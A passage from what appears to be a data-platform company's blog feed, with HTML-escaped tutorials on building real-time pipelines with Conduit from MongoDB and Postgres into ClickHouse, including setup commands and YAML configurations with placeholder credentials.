brew services start mongodb&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;brew&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;mongodb&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;community&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Next, create a user and a database collection in MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;mongo
use admin
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createUser&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;user&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_USER&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;pwd&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_PASS&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
  &lt;span class=&quot;token literal-property property&quot;&gt;roles&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;role&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;readWrite&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;db&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;meroxa&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

use meroxa
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;createCollection&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally add some sample data you want to see streamed over to Clickhouse:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Alice&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;alice@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Bob&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;bob@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;users&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;insertOne&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Charlie&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token literal-property property&quot;&gt;email&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;charlie@example.com&quot;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Setting Up ClickHouse&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For ClickHouse, you can use the following commands to set up the required table. This ensures that ClickHouse has the correct schema to receive the streamed data from MongoDB:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;curl &lt;span class=&quot;token operator&quot;&gt;--&lt;/span&gt;user &lt;span class=&quot;token string&quot;&gt;&apos;USERNAME:PASSWORD&apos;&lt;/span&gt; \
  &lt;span class=&quot;token operator&quot;&gt;--&lt;/span&gt;data&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;binary &apos;&lt;span class=&quot;token constant&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;TABLE&lt;/span&gt; meroxa&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;users&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
      _id String&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      name String&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
      email String
  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;ENGINE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;MergeTree&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;token constant&quot;&gt;ORDER&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;BY&lt;/span&gt; _id&apos; \
  $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CLICKHOUSE_URL&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note: Once you set up a ClickHouse instance or set up a ClickHouse trial on their website, you can find the connect button to get the username, password, and ClickHouse URL to make API calls to your instance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 3: Installing the Required Connectors&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Conduit uses connectors to interface with data sources and sinks. In our case, we’ll use the &lt;strong&gt;MongoDB source connector&lt;/strong&gt; and the &lt;strong&gt;ClickHouse destination connector&lt;/strong&gt;.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Download the Connectors&lt;/strong&gt;: Clone the connectors from the official GitHub repositories:&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-mongo&quot;&gt;MongoDB Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-clickhouse&quot;&gt;ClickHouse Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Build the Connectors&lt;/strong&gt;: After cloning the repositories, navigate into each directory and run &lt;code class=&quot;language-text&quot;&gt;make build&lt;/code&gt; to build the connectors.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Move the Connectors to the Project Directory&lt;/strong&gt;: Place the compiled connectors into the connectors/ folder in your project:&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;├── connectors
│   ├── conduit&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;clickhouse
│   └── conduit&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;connector&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;mongo&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Step 4: Define the Data Pipeline in YAML&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here is a YAML configuration file (mongo-to-clickhouse.yaml) that defines the pipeline for moving data from MongoDB to ClickHouse:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token literal-property property&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token literal-property property&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; mongo&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;ch
    &lt;span class=&quot;token literal-property property&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token literal-property property&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;
      This pipeline showcases real&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;time data streaming from MongoDB to Clickhouse&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
    &lt;span class=&quot;token literal-property property&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;SOURCE&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; mongo&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;mongo
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;uri&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;mongodb://MONGO_USER:MONGO_PASS@MONGO_URL:PORT/MONGO_DB?authSource=admin&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;db&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_DB&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;collection&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;username&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_USER&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;password&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;MONGO_PASS&quot;&lt;/span&gt;
          auth&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;mechanism&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SCRAM-SHA-256&quot;&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;DESTINATION&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; clickhouse&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;sink
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;clickhouse
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://USERNAME:PASSWORD@CLICKHOUSE_URL?secure=true&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;table&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;users&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;keyColumns&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This pipeline is configured to move data from the users collection in MongoDB to the users table in ClickHouse in real-time.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step 5: Running the Pipeline&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;With everything set up, you can now run the pipeline with a single command:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;conduit&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once the pipeline is running, any changes made to the users collection in MongoDB will be streamed in real-time to the users table in ClickHouse.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pipelines.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;Once your pipeline is running, you can visit &lt;a href=&quot;http://localhost:8080/ui&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;http://localhost:8080/ui&lt;/code&gt;&lt;/a&gt; You will see your pipeline defined here. You will also have the ability to inspect the stream to see records that are coming in in real-time from MongoDB and going to ClickHouseDB.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;By following these steps, you can easily set up a real-time data streaming pipeline from MongoDB to ClickHouse using Conduit. This allows you to leverage the best of both worlds—MongoDB’s flexible data model and ClickHouse’s powerful analytics capabilities. With minimal setup, you can move large amounts of data efficiently and gain actionable insights in real time, making it perfect for organizations looking to optimize their data workflows.&lt;/p&gt;
&lt;p&gt;Click &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;here&lt;/a&gt; to schedule a demo today! Stay tuned for future blogs, where we’ll dive deeper into advanced transformations and optimizations you can apply within your streaming pipelines!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Real-Time Analytics Dashboards with Conduit, Postgres and Clickhouse]]></title><description><![CDATA[ClickHouse has established itself as a prominent database for analytical applications due to its technical advantages over competitors like Druid, Pinot, and StarRocks.]]></description><link>https://meroxa.com/blog/building-real-time-analytics-dashboards-with-conduit-postgres-and-clickhouse</link><guid isPermaLink="false">https://meroxa.com/blog/building-real-time-analytics-dashboards-with-conduit-postgres-and-clickhouse</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Mon, 26 Aug 2024 20:32:32 GMT</pubDate><content:encoded>&lt;p&gt;In today&apos;s fast-paced business world, staying competitive and agile is more important than ever. Real-time analytics have become essential for companies looking to keep up with rapid changes and make informed decisions quickly. These analytics provide immediate insights into business operations, customer behavior, and market trends, enabling organizations to respond with speed and precision.&lt;/p&gt;
&lt;p&gt;However, while there are many tools available for querying and analyzing data, getting that data into a format that’s easy to work with can still be a major hurdle. Many teams find themselves juggling multiple vendors to handle data ingestion, cleansing, augmentation, orchestration, streaming, and storage. This can be both costly and complicated.&lt;/p&gt;
&lt;p&gt;In this post, we’ll guide you through how to simplify this process using Meroxa’s Conduit Platform. We’ll show you how to build real-time analytics dashboards by pulling data from Postgres, processing it with Clickhouse, and displaying the results in Grafana. This approach streamlines your data pipeline, making it easier and more efficient to gain the insights your business needs.&lt;/p&gt;
&lt;h2&gt;Why Are Teams Choosing Clickhouse for Analytics?&lt;/h2&gt;
&lt;p&gt;ClickHouse has established itself as a prominent database for analytical applications due to its technical advantages over competitors like Druid, Pinot, and StarRocks. Its columnar storage engine and vectorized query execution enable efficient data compression and parallel processing, resulting in superior query performance on large datasets. ClickHouse&apos;s architecture supports both batch and streaming data ingestion, offering flexibility that surpasses Druid and Pinot, which are optimized for specific workloads. The database&apos;s ACID compliance and support for materialized views further enhance its capabilities for real-time analytics.&lt;/p&gt;
&lt;p&gt;Compared to Druid, ClickHouse offers a more comprehensive SQL support and a simpler architecture, reducing operational complexity. While Pinot excels in low-latency queries, ClickHouse provides better write throughput and more extensive analytical functions. StarRocks, though competitive, lacks the maturity and extensive ecosystem of ClickHouse. ClickHouse&apos;s ability to handle diverse data models, including nested structures, and its support for various index types (e.g., skip indexes, primary key indexes) contribute to its versatility.&lt;/p&gt;
&lt;p&gt;Furthermore, ClickHouse&apos;s distributed architecture allows for horizontal scaling, enabling it to process petabytes of data across clusters. Its support for approximate query processing techniques, like reservoir sampling and HyperLogLog, facilitates efficient analytics on massive datasets. These technical features, combined with its active open-source community and growing ecosystem of tools, position ClickHouse as a robust choice for building scalable and high-performance analytical applications.&lt;/p&gt;
&lt;h3&gt;Step-by-Step Guide to Setting Up a PostgreSQL to ClickHouse Pipeline Using Meroxa Conduit&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download Conduit Binary:&lt;/strong&gt; Follow the Conduit &lt;a href=&quot;https://conduit.io/docs/getting-started/installing-and-running/&quot;&gt;Quickstart&lt;/a&gt; to download and install the Conduit binary on your local machine.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Download &amp;#x26; Install Connectors&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;PostgreSQL Connector&lt;/strong&gt;: &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Conduit PostgreSQL Connector&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ClickHouse Connector&lt;/strong&gt;: &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-clickhouse&quot;&gt;Conduit ClickHouse Connector&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Refer to &lt;a href=&quot;https://conduit.io/docs/connectors/installing&quot;&gt;Installing Connectors&lt;/a&gt; for more information.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/e8950/Screenshot_2024-08-26_at_3.30.20_PM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAABYlAAAWJQFJUiTwAAABHUlEQVR42kVQ11LCUBDlUREVAimEEFJveickdEHG//+j4yHjjA87O9tO2VGY7hEmHeL8MESUHWB6DZR1Ct0uoDIbTgXLb2CwNoZeAn1TYLYMuVtDMRK8zmy8zV2MpGUAEXeQVzGy+oSFHsEOWhTbK9L6DJH1KJoLew0kAsw5T4oTAt6oZopu/4Atmn/AmRog54LGYbm9QTbSgbXu7sgJGGZ7VO2NijK8Lzx8KD7S8kw3RyypstndsaCYl6mFyQCoCJTVBbqVY9s/4Cc9LCqs+28SXOGGLQG/4MctwQQ+GXl1RkLANYm74w8s5rHk/FnWBDT+ZMKGG+2w4o80M4NFG6Zbss6x8WuyO4OCZ5huBZnWp6qAF7WD+vHTsuTgF1x3j/T2egRjAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Example PostgreSQL table with user purchases data.&quot;
        title=&quot;&quot;
        src=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/5a190/Screenshot_2024-08-26_at_3.30.20_PM.png&quot;
        srcset=&quot;/static/3837d1b1bfb84bda2efd7a513c9790ce/772e8/Screenshot_2024-08-26_at_3.30.20_PM.png 200w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/e17e5/Screenshot_2024-08-26_at_3.30.20_PM.png 400w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/5a190/Screenshot_2024-08-26_at_3.30.20_PM.png 800w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/c1b63/Screenshot_2024-08-26_at_3.30.20_PM.png 1200w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/29007/Screenshot_2024-08-26_at_3.30.20_PM.png 1600w,
/static/3837d1b1bfb84bda2efd7a513c9790ce/e8950/Screenshot_2024-08-26_at_3.30.20_PM.png 2000w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Example PostgreSQL table with user purchases data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Provision Secrets for PostgreSQL and ClickHouse&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;PostgreSQL Connection String:&lt;/strong&gt; postgres://&lt;username&gt;:&lt;password&gt;@&lt;host&gt;:&lt;port&gt;/&lt;database&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ClickHouse Connection String:&lt;/strong&gt; https://&lt;username&gt;:&lt;password&gt;@&lt;host&gt;:&lt;port&gt;/&lt;database&gt;?secure=true&lt;/li&gt;
&lt;/ol&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Set Up Your Conduit Pipeline YAML&lt;/strong&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Example YAML Configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;jsx&quot;&gt;&lt;pre class=&quot;language-jsx&quot;&gt;&lt;code class=&quot;language-jsx&quot;&gt;&lt;span class=&quot;token literal-property property&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token literal-property property&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;to&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;ch
    &lt;span class=&quot;token literal-property property&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token literal-property property&quot;&gt;description&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;&lt;/span&gt;
      This pipeline showcases real&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;time data streaming from Postgres to ClickHouse&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;
    &lt;span class=&quot;token literal-property property&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
# &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token constant&quot;&gt;CONNECTOR&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt; &lt;span class=&quot;token constant&quot;&gt;SOURCE&lt;/span&gt;
      &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt; id&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; pg&lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;source
        &lt;span class=&quot;token literal-property property&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token literal-property property&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; standalone&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;postgres
        &lt;span class=&quot;token literal-property property&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres://yourusername:yourpassword@yourhost:5432/yourdatabase&quot;&lt;/span&gt;
          &lt;span class=&quot;token literal-property property&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_purchases&quot;&lt;/span&gt;
